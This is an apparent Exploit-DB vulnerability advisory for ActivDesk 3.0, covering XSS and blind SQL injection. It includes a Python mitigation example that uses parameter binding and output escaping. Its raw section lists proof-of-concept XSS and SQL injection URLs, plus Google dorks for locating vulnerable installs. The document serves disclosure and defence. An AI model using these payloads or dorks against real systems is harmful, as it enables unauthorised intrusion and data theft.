Vendor: ActivDesk
By: Brendan Coles
CVSS: 7.5 (HIGH)
Cross-Site Scripting (XSS) and Blind SQL Injection
CWE: 79 (XSS) and 89 (SQL Injection)
Product Name: ActivDesk
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: N/A
CPE: a:focalmedia:activdesk:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

ActivDesk 3.0 multiple security vulnerabilities

ActivDesk 3.0 is vulnerable to Cross-Site Scripting (XSS) and Blind SQL Injection. An attacker can inject malicious JavaScript code via the 'keywords0', 'keywords1', 'keywords2', and 'keywords3' parameters in the 'search.cgi' script, and can inject malicious SQL code via the 'cid' and 'kid' parameters in the 'kbcat.cgi' and 'kb.cgi' scripts respectively.

Mitigation:

Input validation should be used to prevent XSS and SQL injection attacks. All user-supplied input should be validated and filtered before being used in dynamic SQL queries.
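
An added example (not from the advisory or from ActivDesk's code) of the mitigation above: the 'cid' and 'kid' values are validated as integers and bound as query parameters, and the 'keywords0' to 'keywords3' values are HTML-encoded on output. The use of Python with SQLite, the table schema and all function names are assumptions made for illustration.

```python
import html
import sqlite3

# Payloads copied from the advisory's proof-of-concept URLs, used as test input.
XSS_PAYLOAD = "<script>alert(0)</script>"
SQLI_PAYLOAD = "' or substring(@@version,1,1)=5 and ''='"


def make_db():
    """Constructed in-memory stand-in for the knowledge base (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE kb_article (kid INTEGER PRIMARY KEY, cid INTEGER, title TEXT)")
    db.executemany("INSERT INTO kb_article VALUES (?, ?, ?)",
                   [(1, 10, "Reset a password"), (2, 10, "Open a ticket")])
    return db


def parse_id(raw):
    """Allow-list validation: cid/kid must be 1 to 9 ASCII digits, nothing else."""
    if not isinstance(raw, str) or not raw.isascii() or not raw.isdigit() or len(raw) > 9:
        raise ValueError("invalid identifier")
    return int(raw)


def articles_in_category(db, raw_cid):
    """kbcat.cgi-style lookup: validated id, bound as a parameter, never concatenated."""
    cid = parse_id(raw_cid)
    sql = "SELECT kid, title FROM kb_article WHERE cid = ? ORDER BY kid"
    return db.execute(sql, (cid,)).fetchall()


def article_bound_only(db, raw_kid):
    """kb.cgi-style lookup with binding alone: the value is compared as data, not parsed as SQL."""
    sql = "SELECT kid, title FROM kb_article WHERE kid = ?"
    return db.execute(sql, (raw_kid,)).fetchall()


def render_search_heading(params):
    """search.cgi-style echo of keywords0..keywords3, HTML-encoded at output time."""
    terms = [params.get(f"keywords{i}", "") for i in range(4)]
    shown = ", ".join(html.escape(t, quote=True) for t in terms if t)
    return f"<h2>Results for: {shown}</h2>"


if __name__ == "__main__":
    db = make_db()
    print(articles_in_category(db, "10"))
    print(article_bound_only(db, SQLI_PAYLOAD))
    print(render_search_heading({"keywords0": XSS_PAYLOAD}))
```

Validation and parameter binding are independent layers here: the identifier check rejects the request early, while binding keeps the query safe even if a value reaches it unvalidated.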
Source

Exploit-DB raw data:

ActivDesk 3.0 multiple security vulnerabilities

# Date: 2011-06-24
# Author: Brendan Coles <bcoles@gmail.com>
# Advisory: http://itsecuritysolutions.org/2011-06-24-ActivDesk-3.0-multiple-security-vulnerabilities/

# Software: ActivDesk
# Version: <= 3.0
# Homepage: http://www.webhelpdesk-software.com/
# Google Dorks:
#  inurl:kbcat.cgi ext:cgi
#  "Help Desk Powered By ActivDesk"

# Vendor: FocalMedia
# Homepage: http://www.focalmedia.net/
# Notified: 2011-06-24 - Ticket# 67120010491


# Cross-Site Scripting (XSS):

http://localhost/[PATH]/search.cgi?keywords0=<script>alert(0)</script>
http://localhost/[PATH]/search.cgi?keywords1=<script>alert(1)</script>
http://localhost/[PATH]/search.cgi?keywords2=<script>alert(2)</script>
http://localhost/[PATH]/search.cgi?keywords3=<script>alert(3)</script>


# Blind SQL Injection:

http://localhost/[PATH]/kbcat.cgi?cid=' or substring(@@version,1,1)=5 and ''='
http://localhost/[PATH]/kb.cgi?kid=' or substring(@@version,1,1)=5 and ''='